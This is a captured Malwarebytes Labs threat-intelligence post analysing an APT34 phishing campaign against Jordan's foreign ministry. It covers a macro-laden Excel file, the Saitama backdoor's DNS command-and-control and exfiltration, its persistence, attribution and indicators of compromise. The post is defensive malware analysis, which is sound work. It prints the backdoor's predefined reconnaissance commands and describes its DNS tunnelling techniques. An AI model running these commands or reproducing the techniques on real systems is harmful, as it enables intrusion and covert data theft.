blog.malwarebytes.com Open in urlscan Pro
130.211.198.3  Public Scan

Form analysis
3 forms found in the DOM

<form><span class="fieldset">
    <p><input type="checkbox" value="check" id="chkMain" checked="checked" class="legacy-group-status optanon-status-checkbox"><label for="chkMain">Active</label></p>
  </span></form>

GET

<form id="search-form" onsubmit="submitSearchrightrail(event)" method="get">
  <div class="searchbar-wrap-rightrail">
    <label for="cta-labs-rightrail-search-submit-en" aria-label="cta-labs-rightrail-search-submit-en" aria-labelledby="cta-labs-rightrail-search-submit-en">
      <input type="text" id="st-search-input-rightrail" class="st-search-input-rightrail" placeholder="Search Labs">
    </label>
    <button type="submit" id="cta-labs-rightrail-search-submit-en" aria-label="Submit your search query"><span class=""><img src="https://blog.malwarebytes.com/wp-content/themes/mb-labs-theme/images/search.svg" alt="Magnifying glass"></span>
    </button>
  </div>
</form>

//www.malwarebytes.com/newsletter/

<form class="newsletter-form form-inline" action="//www.malwarebytes.com/newsletter/" _lpchecked="1">
  <div class="email-input">
    <label for="cta-footer-newsletter-input-email-en" aria-label="cta-footer-newsletter-input-email-en" aria-labelledby="cta-footer-newsletter-input-email-en">
      <input type="text" class="email-input-field" id="cta-footer-newsletter-input-email-en" name="email" placeholder="Email address">
    </label>
    <input name="source" type="hidden" value="">
    <input type="submit" class="submit-bttn" id="cta-footer-newsletter-subscribe-email-en" value="">
  </div>
</form>

Text Content

Who doesn't like cookies?

We use cookies to help us enhance your online experience. If that sounds good,
click “Accept All Cookies” or review our Privacy and Cookie Policy.


Close
Accept All Cookies


 * Your Privacy

 * Strictly Necessary Cookies

 * Performance Cookies

 * Functional Cookies

 * Targeting Cookies

 * More Information

Privacy Preference Center

Active

Always Active



Save Settings

Allow All

The official Malwarebytes logo The official Malwarebytes logo in a blue font B

We research. You level up.

       
Personal
Personal
 * Security & Antivirus
 * Malwarebytes for Windows
 * Malwarebytes for Mac
 * Malwarebytes for Chromebook
 * Malwarebytes Browser Guard
 * Overview

 * Security & Antivirus for Mobile
 * Malwarebytes for Android
 * Malwarebytes for iOS
 * Online Privacy
 * Malwarebytes Privacy VPN

 * Get Started
 * Explore all Personal Products
 * Explore Pricing

 * FREE TRIAL OF MALWAREBYTES PREMIUM
   
   Protect your devices, your data, and your privacy—at home or on the go.
   
   Get free trial

Business
Business
   Solutions
 * BY COMPANY SIZE
 * Small Business
    1-99 Employees 
 * Mid-size Businesses
    100-999 Employees
 * Large Enterprise
    1000+ Empoyees
 * BY INDUSTRY
 * Education
 * Finance
 * Healthcare
 * Government

   Products
 * CLOUD-BASED SECURITY MANAGEMENT AND SERVICES
 * Endpoint Protection
 * Endpoint Protection for Servers
 * Endpoint Detection & Response
 * Endpoint Detection & Response for Servers
 * Incident Response
 * Malware Removal Service 
 * Nebula Platform Architecture
 * CLOUD-BASED SECURITY MODULES
 * Vulnerability & Patch Management 
 * Remediation for CrowdStrike®
 * NEXT-GEN ANTIVIRUS FOR SMALL BUSINESS
 * For Teams

 * Get Started
 *  * Find the right solution for your business
    * See business pricing
   
   --------------------------------------------------------------------------------
   
    * Don't know where to start?
    * Help me choose a product
   
   --------------------------------------------------------------------------------
   
    * See what Malwarebytes can do for you
    * Get a free trial
   
   --------------------------------------------------------------------------------
   
    * Our team is ready to help. Call us now
    * +1-800-520-2796

Pricing
Partners
Partners
 * Explore Partnerships

 * Partner Solutions
 * Resellers
 * Managed Service Providers
 * Computer Repair
 * Technology Partners

 * Partner Success Story
 * Marek Drummond
   Managing Director at Optimus Systems
   
   "Thanks to the Malwarebytes MSP program, we have this high-quality product in
   our stack. It’s a great addition, and I have confidence that customers’
   systems are protected."

 * See full story

Resources
Resources
 * Learn About Cybersecurity
 * Antivirus
 * Malware
 * Ransomware
 * See all
 * Malwarebytes Labs
 * Explore

 * Business Resources
 * Reviews
 * Analyst Reports
 * Case Studies
 * See all
 * Press & News
 * Learn more

 * Events
 * 
   
   
   
   Featured Event: RSA 2021

 * See Event

Support
Support
 * Technical Support
 * Support
 * Premium Services
 * Forums
 * Vulnerability Disclosure

 * Training for Personal Products
 * Training for Business Products

 * Featured Content
 * 
   
   
   
   Activate Malwarebytes Privacy on Windows device.

 * See Content

FREE DOWNLOAD
CONTACT US
COMPANY
Company
 * About Malwarebytes
 * Careers
 * News & Press

SIGN IN
Sign In
 * My Account
 * Cloud Console
 * Partner Portal

SUBSCRIBE


New business customers save 15% on powerful, easy-to-use EDR – See Offer >

Check out our MITRE ATT&CK Top performance!  View Results >

Threat Intelligence


APT34 TARGETS JORDAN GOVERNMENT USING NEW SAITAMA BACKDOOR

Posted: May 10, 2022 by Threat Intelligence Team
Last updated: May 13, 2022

A deep dive into a sophisticated attack that used the Saitama backdoor.

On April 26th, we identified a suspicious email that targeted a government
official from Jordan’s foreign ministry. The email contained a malicious Excel
document that drops a new backdoor named Saitama. Following our investigation,
we were able to attribute this attack to the known Iranian Actor APT34.

Also known as OilRig/COBALT GYPSY/IRN2/HELIX KITTEN, APT34 is an Iranian threat
group that has targeted Middle Eastern countries and victims worldwide since at
least 2014. The group is known to focus on the financial, governmental, energy,
chemical, and telecommunication sectors.

In this blog post, we describe the attack flow and share details about the
Saitama backdoor.


MALICIOUS EMAIL FILE

The malicious email was sent to the victim via a Microsoft Outlook account with
the subject “Confirmation Receive Document” with an Excel file called
“Confirmation Receive Document.xls”. The sender pretends to be a person from the
Government of Jordan by using its coat of arms as a signature.

Figure 1: Malicious email


EXCEL DOCUMENT

The Excel attachment contains a macro that performs malicious activities. The
document has an image that tries to convince the victim to enable a macro.

Figure 2: Excel doc

After enabling the macro, the image is replaced with the Jordan government’s the
coat of the arms:

Figure 3: Excel doc after enabling the macro

The macro has been executed on WorkBook_Open(). Here are the main
functionalities of this macro:

Figure 4: Macro
 * Hides the current sheet and shows the new sheet that contains the coat of
   arms image.
 * Calls the “eNotif’ function which is used to send a notification of each
   steps of macro execution to its server using the DNS protocol. To send a
   notification it builds the server domain for that step that contains the
   following parts: “qw” + identification of the step (in this step “zbabz”) +
   random number + domain name (joexpediagroup.com) =
   qwzbabz7055.joexpediagroup.com. Then it uses the following WMI query to get
   the IP address of the request: Select * From Win32_PingStatus Where Address =
   ‘” & p_sHostName & “‘” which performs the DNS communication the the created
   subdomain.
 * Creates a TaskService object and Gets the task folder that contains the list
   of the current tasks
 * Calls ENotif function
 * Checks if there is a mouse connected to PC and if that is the case performs
   the following steps
   * Creates %APPDATA%/MicrosoftUpdate directory
   * Creates “Update.exe”, “Update.exe.config” and
     “Microsoft.Exchange.WenServices.dll”
   * Reads the content of the UserForm1.label1, UserForm2.label1 and
     UserForm3.label1 that are in base64 format, decodes them and finally writes
     them into the created files in the previous step
   * Calls a ENotif function for each writes function
 * Checks the existence of the Update.exe file and if for some reason it has not
   been written to disk, it writes it using a technique that loads a DotNet
   assembly directly using mscorlib and Assembly.Load by manually accessing the
   VTable of the IUnknown. This technique was taken from Github (link). Even
   though, this technique was not used in this macro since the file was already
   written, the function name (“Test”) suggests that the threat actor is trying
   to implement this technique in future attacks.
 * Finally, it calls the ENotif function.

Figure 5: Load .Net assembly
 * Defines a xml schema for a scheduled task and registers it using the
   RegisterTask function. The name of the scheduled task is MicrosoftUpdate and
   is used to make update.exe persistent.

Figure 6: Task Schema


SAITAMA BACKDOOR – A FINITE STATE MACHINE

The dropped payload is a small backdoor that is written in .Net. It has the
following interesting pdb path:
E:\Saitama\Saitama.Agent\obj\Release\Saitama.Agent.pdb.

Saitama backdoor abuses the DNS protocol for its command and control
communications. This is stealthier than other communication methods, such as
HTTP. Also, the actor cleverly uses techniques such as compression and long
random sleep times. They employed these tricks to disguise malicious traffic in
between legitimate traffic.

Figure 7: DNS communications

Another element that we found interesting about this backdoor is the way that it
is implemented. The whole flow of the program is defined explicitly as a
finite-state machine, as shown in the Figure 7. In short, the machine will
change its state depending on the command sent to every state. Graphically, the
program flow can be seen as this:

Figure 8: Graphical view of the state machine

The finite-machine state can be:


BEGIN

It is the initial state of the machine. It just accepts the start command that
puts the machine into the ALIVE state.


ALIVE

This state fetches the C&C server, expecting to receive a command from the
attackers. These servers are generated by using the PRNG algorithm that involves
transformations like the Mersenne Twister. These transformations will generate
subdomains of the hard coded domains in the Config class (Figure 8).

Figure 9: Main domains are hardcoded

Figure 9 shows an example of the generated subdomain:

Figure 10: Connection attempt to a C&C server

This state has two possible next stages. If the performed DNS request fails, the
next stage is SLEEP. Otherwise, the next stage is RECEIVE.


SLEEP AND SECOND SLEEP

These states put the backdoor in sleep mode. The amount of time that the program
will sleep is determined by the previous stage. It is clear that one of the main
motivations of the actor is to be as stealthy as possible. For example,
unsuccessful DNS requests puts the backdoor in sleep mode for a time between 6
and 8 hours! There are different sleep times depending on the situations (values
are expressed in milliseconds):

Figure 11: A different sleep time for every situation

There is also a “Second Sleep” state that puts the program on sleep mode a
different amount of time.


RECEIVE

This state is used to receiving commands from the C&C servers. Commands are sent
using the IP address field that is returned by the DNS requests. Further details
about the communication protocol are provided later in this report. In a
nutshell, every DNS request is capable of receiving 4 bytes. The backdoor will
concatenate responses, building buffers in that way. These buffers will contain
the commands that the backdoor will execute.


DO (DOTASK)

That state will execute commands received from the server. The backdoor has
capabilities like executing remote pre-established commands, custom commands or
dropping files. The communication supports compression, also. The following
figure shows the list of possible commands that can be executed by the backdoor.

ID Type Command1PSGet-NetIPAddress -AddressFamily IPv4 | Select-Object
IPAddress2PSGet-NetNeighbor -AddressFamily IPv4 | Select-Object “IPADDress”3CMD
whoami4PS[System.Environment]::OSVersion.VersionString5CMDnet user6————[NOT
USED]———7PSGet-ChildItem -Path “C:\Program Files” | Select-Object
Name8PSGet-ChildItem -Path ‘C:\Program Files (x86)’ | Select-Object
Name9PSGet-ChildItem -Path ‘C:’ | Select-Object
Name10CMDhostname11PSGet-NetTCPConnection | Where-Object {$_.State -eq
“Established”} | Select-Object “LocalAddress”, “LocalPort”, “RemoteAddress”,
“RemotePort”12PS$(ping -n 1 10.65.4.50 | findstr /i ttl) -eq $null;$(ping -n 1
10.65.4.51 | findstr /i ttl) -eq $null;$(ping -n 1 10.65.65.65 | findstr /i ttl)
-eq $null;$(ping -n 1 10.65.53.53 | findstr /i ttl) -eq $null;$(ping -n 1
10.65.21.200 | findstr /i ttl) -eq $null13PSnslookup
ise-posture.mofagov.gover.local | findstr /i Address;nslookup webmail.gov.jo |
findstr /i Address14PS$(ping -n 1 10.10.21.201 | findstr /i ttl) -eq
$null;$(ping -n 1 10.10.19.201 | findstr /i ttl) -eq $null;$(ping -n 1
10.10.19.202 | findstr /i ttl) -eq $null;$(ping -n 1 10.10.24.200 | findstr /i
ttl) -eq $null15PS$(ping -n 1 10.10.10.4 | findstr /i ttl) -eq $null;$(ping -n 1
10.10.50.10 | findstr /i ttl) -eq $null;$(ping -n 1 10.10.22.50 | findstr /i
ttl) -eq $null;$(ping -n 1 10.10.45.19 | findstr /i ttl) -eq $null16PS$(ping -n
1 10.65.51.11 | findstr /i ttl) -eq $null;$(ping -n 1 10.65.6.1 | findstr /i
ttl) -eq $null;$(ping -n 1 10.65.52.200 | findstr /i ttl) -eq $null;$(ping -n 1
10.65.6.3 | findstr /i ttl) -eq $null17PS$(ping -n 1 10.65.45.18 | findstr /i
ttl) -eq $null;$(ping -n 1 10.65.28.41 | findstr /i ttl) -eq $null;$(ping -n 1
10.65.36.13 | findstr /i ttl) -eq $null;$(ping -n 1 10.65.51.10 | findstr /i
ttl) -eq $null18PS$(ping -n 1 10.10.22.42 | findstr /i ttl) -eq $null;$(ping -n
1 10.10.23.200 | findstr /i ttl) -eq $null;$(ping -n 1 10.10.45.19 | findstr /i
ttl) -eq $null;$(ping -n 1 10.10.19.50 | findstr /i ttl) -eq $null19PS$(ping -n
1 10.65.45.3 | findstr /i ttl) -eq $null;$(ping -n 1 10.65.4.52 | findstr /i
ttl) -eq $null;$(ping -n 1 10.65.31.155 | findstr /i ttl) -eq $null;$(ping -n 1
ise-posture.mofagov.gover.local | findstr /i ttl) -eq
$null20PSGet-NetIPConfiguration | Foreach IPv4DefaultGateway | Select-Object
NextHop21PSGet-DnsClientServerAddress -AddressFamily IPv4 | Select-Object
SERVERAddresses22CMDsysteminfo | findstr /i \”Domain\”

Figure 12: List of predefined commands

It is pretty shocking to see that even when attackers have the possibility of
sending any command, they choose to add that predefined list in the backdoor in
Base64 format. As we can see, some of them are common reconnaissance snippets,
but some of them are not that common. In fact, some of the commands contain
internal IPs and also internal domain names (like
ise-posture.mofagov.gover.local). That shows that this malware was clearly
targeted and also indicates that the actor has some previous knowledge about the
internal infrastructure of the victim.


SEND – SEND AND RECEIVE

The Send state is used to send the results generated by commands to the actor’s
server. In this case, the name of the subdomain will contain the data. As domain
names are used to exfiltrate unknown amounts of data, attackers had to split
this data in different buffers. Every buffer is then sent through a different
DNS request. As it can be seen in the Figure 12, all the required information in
order to reconstruct original data is sent to the attackers. The size of the
buffer is only sent in the first packet.

Figure 13: Send data to server


ATTRIBUTION

There are several indicators that suggest that this campaign has been operated
by APT34.

 * Maldoc similarity: The madoc used in this campaign shared some similarities
   with maldocs used in previous campaigns of this actor. More specifically
   similar to what was mentioned in CheckPoint’s report this maldoc registers a
   scheduled task that would launch the executable every X minutes, also it uses
   the same anti sandboxing technique (checking if there is a mouse connected to
   the PC or not). Finally, we see a similar pattern to beacon back to the
   attacker server and inform the attacker about the current stage of execution.
 * Victims similarity: The group is known to target the government of Jordan and
   this is the case in this campaign.
 * Payload similarity: DNS is the most common method used by APT34 for its C&C
   communications. The group is also known to use uncommon encodings such as
   Base32 and Base36 in its previous campaigns. The Saitama backdoor uses a
   similar Base32 encoding for sending data to the servers that is used by
   DNSpionage. Also, to build subdomains it uses Base32 encoding that is similar
   to what was reported by Mandiant.
   

Malwarebytes customers are protected from this attack via our Anti-Exploit
layer.




IOCS

Maldoc:
Confirmation Receive Document.xls
26884f872f4fae13da21fa2a24c24e963ee1eb66da47e270246d6d9dc7204c2b
Saitama backdoor:
update.exe
e0872958b8d3824089e5e1cfab03d9d98d22b9bcb294463818d721380075a52d
C2s:
uber-asia.com
asiaworldremit.com
joexpediagroup.com


RELATED

How did the WannaCry ransomworm spread?May 19, 2017In "Cybercrime"

New UAC-0056 activity: There’s a Go Elephant in the roomApril 1, 2022In "Threat
Intelligence"

A week in security (May 9 – 15)May 16, 2022In "A week in security"

SHARE THIS ARTICLE

--------------------------------------------------------------------------------

COMMENTS



--------------------------------------------------------------------------------

RELATED ARTICLES

A week in security


A WEEK IN SECURITY (MAY 9 – 15)

May 16, 2022 - The most important and interesting computer security stories from
the last seven days.

CONTINUE READINGNo Comments

--------------------------------------------------------------------------------

ABOUT THE AUTHOR

Threat Intelligence Team





Contributors


Threat Center


Podcast


Glossary


Scams


Write for Labs

CYBERSECURITY INFO YOU CAN'T DO WITHOUT

Want to stay informed on the latest news in cybersecurity? Sign up for our
newsletter and learn how to protect your computer from threats.



Imagine a world without malware. We do.

FOR PERSONAL

FOR BUSINESS

COMPANY

ABOUT US

CAREERS

NEWS AND PRESS

MY ACCOUNT

SIGN IN

CONTACT US

GET SUPPORT

CONTACT SALES

3979 Freedom Circle, 12th Floor
Santa Clara, CA 95054
One Albert Quay, 2nd Floor
Cork T12 X8N6
Ireland

   English
Legal
Privacy
Accessibility
Terms of Service


© 2022 All Rights Reserved

Select your language

 * English
 * Deutsch
 * Español
 * Français
 * Italiano
 * Português (Portugal)
 * Português (Brasil)
 * Nederlands
 * Polski
 * Pусский
 * 日本語
 * Svenska

Cybersecurity basics

Your intro to everything relating to cyberthreats, and how to stop them.



 

Loading Comments...

 


You must be logged in to post a comment.